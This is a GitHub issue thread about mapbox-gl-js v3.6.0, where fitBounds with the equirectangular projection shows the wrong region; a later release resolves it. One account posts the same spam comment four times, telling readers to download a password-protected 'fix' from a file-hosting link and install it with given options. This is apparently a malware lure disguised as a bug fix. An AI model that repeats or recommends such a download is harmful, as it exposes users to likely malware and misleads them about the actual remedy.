### ISSUE TITLE
map.fitBounds() sets an error bounds when using "equirectangular" projection.

### ISSUE THREAD

**Issue by r-White55Kai** [mapbox/mapbox-gl-js#13263]
### mapbox-gl-js version:
3.6.0

### browser:
Chrome newest version on Mac

### Steps to Trigger Behavior
 1. Using "equirectangular" projection
 2. map.fitBounds([
    [116, 39.5], // southwestern corner of the bounds
    [116.5, 40] // northeastern corner of the bounds
  ])

### Link to Demonstration

https://jsfiddle.net/cc_meow/gmftzqcL/37/
https://jsfiddle.net/cc_meow/gmftzqcL/39/

### Expected Behavior
This should give the map of Beijing
![20240827-115451](https://github.com/user-attachments/assets/5d785f7d-e5fe-449a-840a-b23b3e4a81dd)

### Actual Behavior
Give the map of Gaotang
![image](https://github.com/user-attachments/assets/1885254c-64c6-4757-8155-b2e255de9b40)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by r-White55Kai** [comment]
Could somebody help me?  👀

**Comment by r-White55Kai** [comment]
> Hi @r-White55Kai,
> 
> We've improved the `fitBounds` in the latest [v3.7.0-beta.1](https://github.com/mapbox/mapbox-gl-js/releases/tag/v3.7.0-beta.1) release. Could you please try it out and share your feedback? Thanks!

Great! It solves my problem perfectly, thanks.
